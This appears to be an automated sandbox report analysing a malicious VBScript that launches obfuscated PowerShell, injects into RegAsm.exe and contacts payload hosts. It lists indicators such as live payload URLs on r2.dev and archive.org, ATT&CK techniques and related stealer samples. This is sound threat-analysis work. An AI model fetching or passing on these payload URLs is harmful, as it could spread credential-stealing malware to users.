                  Source: Yara matchFile source: 4.2.powershell.exe.1a05d6bd738.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.powershell.exe.1a064dd0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.powershell.exe.1a064dd0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.powershell.exe.1a05d6bd738.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.1595867471.000001A064DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1572696203.000001A05CEA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1572696203.000001A05D8A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3776, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 00000004.00000002.1572696203.000001A05D8A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3776, type: MEMORYSTR
                  Source: Yara matchFile source: 4.2.powershell.exe.1a05d6bd738.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.powershell.exe.1a064dd0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.powershell.exe.1a064dd0000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.powershell.exe.1a05d6bd738.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.1595867471.000001A064DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1572696203.000001A05CEA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information221
                  Scripting
                  Valid Accounts11
                  Command and Scripting Interpreter
                  221
                  Scripting
                  11
                  Process Injection
                  31
                  Virtualization/Sandbox Evasion
                  OS Credential Dumping11
                  Security Software Discovery
                  Remote Services1
                  Archive Collected Data
                  11
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Exploitation for Client Execution
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  11
                  Process Injection
                  LSASS Memory1
                  Process Discovery
                  Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts3
                  PowerShell
                  Logon Script (Windows)Logon Script (Windows)1
                  Deobfuscate/Decode Files or Information
                  Security Account Manager31
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                  Obfuscated Files or Information
                  NTDS1
                  Application Window Discovery
                  Distributed Component Object ModelInput Capture3
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Software Packing
                  LSA Secrets1
                  File and Directory Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain Credentials12
                  System Information Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1523820 Sample: PofaABvatI.vbs Startdate: 02/10/2024 Architecture: WINDOWS Score: 100 29 pub-26ee9be236b54d0cb1b570a203543b93.r2.dev 2->29 31 ia600100.us.archive.org 2->31 39 Multi AV Scanner detection for domain / URL 2->39 41 Suricata IDS alerts for network traffic 2->41 43 Found malware configuration 2->43 45 11 other signatures 2->45 9 wscript.exe 1 2->9         started        signatures3 process4 signatures5 47 VBScript performs obfuscated calls to suspicious functions 9->47 49 Suspicious powershell command line found 9->49 51 Wscript starts Powershell (via cmd or directly) 9->51 53 3 other signatures 9->53 12 powershell.exe 7 9->12         started        process6 signatures7 55 Suspicious powershell command line found 12->55 57 Obfuscated command line found 12->57 59 Suspicious execution chain found 12->59 61 Found suspicious powershell code related to unpacking or dynamic code loading 12->61 15 powershell.exe 14 15 12->15         started        19 conhost.exe 12->19         started        process8 dnsIp9 33 pub-26ee9be236b54d0cb1b570a203543b93.r2.dev 162.159.140.237, 443, 49705 CLOUDFLARENETUS United States 15->33 35 ia600100.us.archive.org 207.241.227.240, 443, 49704 INTERNET-ARCHIVEUS United States 15->35 37 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 15->37 21 RegAsm.exe 15->21         started        23 RegAsm.exe 15->23         started        25 RegAsm.exe 15->25         started        27 2 other processes 15->27 signatures10 process11

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  PofaABvatI.vbs5%ReversingLabs
                  PofaABvatI.vbs8%VirustotalBrowse
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  ia600100.us.archive.org0%VirustotalBrowse
                  pub-26ee9be236b54d0cb1b570a203543b93.r2.dev16%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  https://account.dyn.com/0%URL Reputationsafe
                  http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                  https://go.micro0%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  https://oneget.orgX0%URL Reputationsafe
                  https://aka.ms/pscore680%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://oneget.org0%URL Reputationsafe
                  http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                  http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
                  https://pub-26ee9be236b54d0cb1b570a203543b93.r2.dev4%VirustotalBrowse
                  http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
                  https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt10%VirustotalBrowse
                  https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtFyL;DLjbase64Content2%VirustotalBrowse
                  http://pub-26ee9be236b54d0cb1b570a203543b93.r2.dev16%VirustotalBrowse
                  https://ia600100.us.archive.org1%VirustotalBrowse
                  http://ia600100.us.archive.org0%VirustotalBrowse
                  https://github.com/Pester/Pester1%VirustotalBrowse
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  ia600100.us.archive.org
                  207.241.227.240
                  truefalseunknown
                  pub-26ee9be236b54d0cb1b570a203543b93.r2.dev
                  162.159.140.237
                  truetrueunknown
                  NameMaliciousAntivirus DetectionReputation
                  https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtfalseunknown
                  https://pub-26ee9be236b54d0cb1b570a203543b93.r2.dev/mmili.txttrue
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1572696203.000001A05C90C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1557394015.000001A04E252000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000004.00000002.1557394015.000001A04DFC7000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://account.dyn.com/powershell.exe, 00000004.00000002.1572696203.000001A05D8A9000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1557394015.000001A04E1CC000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1557394015.000001A04E1CC000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://go.micropowershell.exe, 00000004.00000002.1557394015.000001A04D8BE000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://contoso.com/Licensepowershell.exe, 00000004.00000002.1557394015.000001A04E252000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://pub-26ee9be236b54d0cb1b570a203543b93.r2.devpowershell.exe, 00000004.00000002.1557394015.000001A04CCE1000.00000004.00000800.00020000.00000000.sdmptrueunknown
                    https://contoso.com/Iconpowershell.exe, 00000004.00000002.1557394015.000001A04E252000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://ia600100.us.arXpowershell.exe, 00000004.00000002.1557394015.000001A04DF79000.00000004.00000800.00020000.00000000.sdmpfalse
                      unknown
                      http://schemas.microsoft.cwscript.exe, 00000000.00000003.1430184240.00000150A8BE7000.00000004.00000020.00020000.00000000.sdmpfalse
                        unknown
                        https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtFyL;DLjbase64Contentpowershell.exe, 00000004.00000002.1557394015.000001A04CAB3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1557394015.000001A04E1CC000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://contoso.com/powershell.exe, 00000004.00000002.1557394015.000001A04E252000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1572696203.000001A05C90C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1557394015.000001A04E252000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://pub-26ee9be236b54d0cb1b570a203543b93.r2.devpowershell.exe, 00000004.00000002.1557394015.000001A04CCE1000.00000004.00000800.00020000.00000000.sdmptrueunknown
                        https://oneget.orgXpowershell.exe, 00000004.00000002.1557394015.000001A04DFC7000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://ia600100.us.archive.orgpowershell.exe, 00000004.00000002.1557394015.000001A04D8BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1557394015.000001A04CAB3000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        https://aka.ms/pscore68powershell.exe, 00000002.00000002.1608428620.000001EBC0C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1608428620.000001EBC0C19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1557394015.000001A04C891000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1608428620.000001EBC0C5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1557394015.000001A04C891000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://oneget.orgpowershell.exe, 00000004.00000002.1557394015.000001A04DFC7000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://ia600100.us.archive.orgpowershell.exe, 00000004.00000002.1557394015.000001A04DF7F000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                        http://ip-api.com/line/?fields=hostingpowershell.exe, 00000004.00000002.1572696203.000001A05D8A9000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        162.159.140.237
                        pub-26ee9be236b54d0cb1b570a203543b93.r2.devUnited States
                        13335CLOUDFLARENETUStrue
                        207.241.227.240
                        ia600100.us.archive.orgUnited States
                        7941INTERNET-ARCHIVEUSfalse
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1523820
                        Start date and time:2024-10-02 05:21:06 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 4m 35s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:13
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:PofaABvatI.vbs
                        renamed because original name is a hash value
                        Original Sample Name:05f1bfad1052e82ed6fc8d3348ea86f1958b8d8f39d331967edba843ce1214f7.vbs
                        Detection:MAL
                        Classification:mal100.troj.expl.evad.winVBS@16/5@2/2
                        EGA Information:
                        • Successful, ratio: 50%
                        HCA Information:
                        • Successful, ratio: 73%
                        • Number of executed functions: 5
                        • Number of non-executed functions: 2
                        Cookbook Comments:
                        • Found application associated with file extension: .vbs
                        • Stop behavior analysis, all processes terminated
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target powershell.exe, PID 2952 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        TimeTypeDescription
                        23:22:08API Interceptor45x Sleep call for process: powershell.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        162.159.140.237http://pub-0ae50a4c573c409f93585499aeac650f.r2.dev/cvbnmkjh.htmlGet hashmaliciousHTMLPhisherBrowse
                        • pub-0ae50a4c573c409f93585499aeac650f.r2.dev/cvbnmkjh.html
                        http://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.htmlGet hashmaliciousHTMLPhisherBrowse
                        • pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html
                        http://pub-ca8a3ace07094ee9967971c12a96a935.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                        • pub-ca8a3ace07094ee9967971c12a96a935.r2.dev/index.html
                        http://pub-6f594b43277e4071a0c14266387a1ea8.r2.dev/fdsaghjk.htmlGet hashmaliciousHTMLPhisherBrowse
                        • pub-6f594b43277e4071a0c14266387a1ea8.r2.dev/fdsaghjk.html
                        http://pub-d2dba8f127424f0cb0341658081256fa.r2.dev/kjhdishs.htmlGet hashmaliciousHTMLPhisherBrowse
                        • pub-d2dba8f127424f0cb0341658081256fa.r2.dev/kjhdishs.html
                        http://pub-64fd1e2750a4440ab4fe49fc5a421a35.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                        • pub-64fd1e2750a4440ab4fe49fc5a421a35.r2.dev/index.html
                        http://pub-72f4175190054b068a6db1f116f55ca9.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                        • pub-72f4175190054b068a6db1f116f55ca9.r2.dev/index.html
                        http://pub-9a2fba40e7084a1eb9d96885ba6cecf2.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                        • pub-9a2fba40e7084a1eb9d96885ba6cecf2.r2.dev/index.html
                        http://pub-a5dea08759934238bd2363b86fdeed1a.r2.dev/makinsalin.htmlGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                        • pub-a5dea08759934238bd2363b86fdeed1a.r2.dev/makinsalin.html
                        http://pub-783fdf92836240fa96dda87e23c5c881.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                        • pub-783fdf92836240fa96dda87e23c5c881.r2.dev/index.html
                        207.241.227.240SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                          RFQ 2024.09.26-89 vivecta.vbsGet hashmaliciousPureLog StealerBrowse
                            AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                              sostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                  SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                    LJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                      hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                                        wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                                          TM3utH2CsU.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            pub-26ee9be236b54d0cb1b570a203543b93.r2.devmitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                            • 172.66.0.235
                                            REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                            • 172.66.0.235
                                            Company profile.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                            • 162.159.140.237
                                            Quote_Request.jsGet hashmaliciousPureLog StealerBrowse
                                            • 172.66.0.235
                                            Enquiry.jsGet hashmaliciousPureLog StealerBrowse
                                            • 172.66.0.235
                                            Purchase Order.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                            • 162.159.140.237
                                            RFQ.vbsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                            • 162.159.140.237
                                            HONG_KONG_CHEMHERE_QUOTE_REQUEST.vbsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                            • 104.18.3.35
                                            Data-Sheet.jsGet hashmaliciousUnknownBrowse
                                            • 104.18.3.35
                                            Enquiry.jsGet hashmaliciousUnknownBrowse
                                            • 104.18.2.35
                                            ia600100.us.archive.orgSecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                            • 207.241.227.240
                                            RFQ 2024.09.26-89 vivecta.vbsGet hashmaliciousPureLog StealerBrowse
                                            • 207.241.227.240
                                            AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                            • 207.241.227.240
                                            sostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            LJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            hnvc.vbsGet hashmaliciousPureLog StealerBrowse
                                            • 207.241.227.240
                                            wm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                                            • 207.241.227.240
                                            BL.xlsGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            CLOUDFLARENETUSmitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                            • 172.66.0.235
                                            http://lamourskinclinic.com.auGet hashmaliciousUnknownBrowse
                                            • 104.18.10.207
                                            https://unpaidrefund.top/view/mygovGet hashmaliciousHTMLPhisherBrowse
                                            • 188.114.96.3
                                            payment copy.exeGet hashmaliciousFormBookBrowse
                                            • 23.227.38.74
                                            DHL Shipping documents 0020398484995500.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.26.12.205
                                            https://docs.google.com/presentation/d/e/2PACX-1vRuKBrQqA6BNfxZo0BAmhaaVHWHS5xGpGnvHJ3KKWtc6LdsEuOoWSlBNaOKZjp5GXLjhWJKRMb-grou/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                            • 104.21.46.216
                                            https://sanbernardinoscounty.telcom-info.com/Get hashmaliciousHtmlDropperBrowse
                                            • 104.21.55.67
                                            Electronic_Receipt_ATT0001.htmGet hashmaliciousUnknownBrowse
                                            • 104.17.25.14
                                            http://t1.global.clubavolta.com/r/?id=h53ebcb4b,29506a5f,2988ba3e&e=cDE9UkVEX0dMX0xveWFsdHlMYXVuY2hTb2x1cy1OT0NPTS1BTEwtMDExMDIwMjQtMV9YWCZwMj1kNzEwNWE1Zi00NjE3LWVmMTEtOWY4OS0wMDBkM2EyMmNlYTE&s=MLotNdk8aEH7W1636YhgxIdQC5od3UWYqTZw3tm9630Get hashmaliciousUnknownBrowse
                                            • 172.67.180.104
                                            http://www.johnhdaniel.comGet hashmaliciousUnknownBrowse
                                            • 104.18.36.155
                                            INTERNET-ARCHIVEUSSecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                            • 207.241.227.240
                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtfGet hashmaliciousRemcosBrowse
                                            • 207.241.227.96
                                            RFQ 2024.09.26-89 vivecta.vbsGet hashmaliciousPureLog StealerBrowse
                                            • 207.241.227.240
                                            AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                            • 207.241.227.240
                                            REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                            • 207.241.235.61
                                            sostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.comGet hashmaliciousUnknownBrowse
                                            • 207.241.237.3
                                            LJ1IZDkHyE.htaGet hashmaliciousCobalt Strike, Remcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousCredential FlusherBrowse
                                            • 162.159.140.237
                                            • 207.241.227.240
                                            mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                            • 162.159.140.237
                                            • 207.241.227.240
                                            DHL Shipping documents 0020398484995500.exeGet hashmaliciousAgentTeslaBrowse
                                            • 162.159.140.237
                                            • 207.241.227.240
                                            http://tvsurf.jp/Get hashmaliciousUnknownBrowse
                                            • 162.159.140.237
                                            • 207.241.227.240
                                            https://files.constantcontact.com/2d77228b901/702368a5-3f96-4cb6-b61d-aab8728be1ff.pdfGet hashmaliciousUnknownBrowse
                                            • 162.159.140.237
                                            • 207.241.227.240
                                            https://sanbernardinoscounty.telcom-info.com/Get hashmaliciousHtmlDropperBrowse
                                            • 162.159.140.237
                                            • 207.241.227.240
                                            OXrZ6fj4Hq.exeGet hashmaliciousNeshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWormBrowse
                                            • 162.159.140.237
                                            • 207.241.227.240
                                            Pedido09669281099195.com.exeGet hashmaliciousDarkTortilla, QuasarBrowse
                                            • 162.159.140.237
                                            • 207.241.227.240
                                            https://finalstepgetshere.com/uploads/beta9.zipGet hashmaliciousLummaCBrowse
                                            • 162.159.140.237
                                            • 207.241.227.240
                                            https://k7qo.sarnerholz.cam/APRjVfmkGet hashmaliciousUnknownBrowse
                                            • 162.159.140.237
                                            • 207.241.227.240
                                            No context
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):1.1940658735648508
                                            Encrypted:false
                                            SSDEEP:3:NlllulN7rlz:NllU
                                            MD5:60800FE3EBA2CA09118A33A34BF00BD8
                                            SHA1:4DBA1472443F1B047803693393F61A2182695D2A
                                            SHA-256:D85FCEE5CD239F2EE739F27980E9EBB1BE0573405BC7C004DB4E828D1A2D50A0
                                            SHA-512:AFD4B6861BD4A06C23FEC68375FD4B012E8A456ED8EEF708B3F50C6FCD40D7B599B9967EDCFF9E917F9B8BF567ED2B6C5B7EE83AA2F6965A6D02BB1DABB9010F
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:@...e................................................@..........
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                            File type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                            Entropy (8bit):3.7400157753176115
                                            TrID:
                                            • Text - UTF-16 (LE) encoded (2002/1) 64.44%
                                            • MP3 audio (1001/1) 32.22%
                                            • Lumena CEL bitmap (63/63) 2.03%
                                            • Corel Photo Paint (41/41) 1.32%
                                            File name:PofaABvatI.vbs
                                            File size:512'924 bytes
                                            MD5:5b4a21e35cce386f8692a4a5d684cb14
                                            SHA1:38cefdde89a5577f3d89396afd6fc15c8f89200e
                                            SHA256:05f1bfad1052e82ed6fc8d3348ea86f1958b8d8f39d331967edba843ce1214f7
